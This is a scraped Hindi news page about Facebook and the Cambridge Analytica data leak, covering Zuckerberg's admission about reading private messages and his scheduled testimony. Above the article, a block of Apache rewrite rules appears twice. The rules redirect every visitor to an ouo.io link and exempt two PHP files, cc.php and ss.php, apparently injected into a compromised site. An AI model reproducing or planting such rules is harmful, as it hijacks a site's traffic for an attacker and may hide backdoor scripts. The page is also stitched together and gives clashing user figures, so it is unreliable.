
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 447
Previous Nextवाशिंगटन। फेसबुक के मुख्य कार्याधिकारी मार्क जकरबर्ग ने आखिरकार स्वीकार कर लिया है कि फेसबुक यूजर्स के प्राइवेट मैसेज को पढ़ता है। आपको बता दें कि फेसबुक के 8 करोड़ 70 लाख यूजर्स के निजी डेटा में पॉलिटिकल कंसल्टेंसी कैंब्रिज एनालिटिका ने सेंध लगाई है। सोशल मीडिया जगत की सबसे बड़ी कंपनियों में से एक फेसबुक ने कहा कि कैंब्रिज एनालिटिका के साथ करीब आठ करोड़ 70 लाख यूजर्स के डेटा अनुचित ढंग से साझा किए गए। कैंब्रिज एनालिटिका के साथ फेसबुक ने जिन 8 करोड़ 87 लाख लोगों के निजी डेटा साझा किए हैं, उनमें ज्यादातर अमेरिका के रहने वाले हैं। कैंब्रिज एनालिटिका ने अमेरिका के राष्ट्रपति चुनावों में डोनाल्ड ट्रंप के लिए काम किया था। फेसबुक के चीफ टेक्नोलॉजी ऑफिसर माइक स्क्रोपर ने एक ब्लॉग पोस्ट लिखकर ये जानकारी सार्वजनिक की है।
जकरबर्ग बोले - गलतियों के बावजूद, मैं ही हूं 'राइट च्वाइस'
फेसबुक ने कहा है कि वह तीसरी पार्टी के ऐप द्वारा यूजर्स के निजी डेटा में सेंध लगाने को रोकने के लिए कड़े कदम उठा रहा है। इस बीच मार्क जकरबर्ग ने कहा है कि तमाम गलतियों के बावजूद फेसबुक को लीड करने के लिए वही सही व्यक्ति हैं। सोशल मीडिया वेबसाइट फेसबुक के मुख्य कार्याधिकारी मार्क जकरबर्ग 11 अप्रैल को संसद की समिति के समक्ष हाजिर होंगे। वाणिज्य विषयक संसदीय समिति ने कल यह घोषणा की। फेसबुक यूजर्स की निजी जानकारी के कथित दुरूपयोग के कैंब्रिज एनालिटिका घपले के सामने आने के मद्देनजर जकरबर्ग की यह पेशी हो रही है। समिति ने उम्मीद जताई कि इस सुनवाई से ग्राहक डेटा गोपनीयता से जुड़े महत्वपूर्ण मुद्दों पर रोशनी पड़ेगी।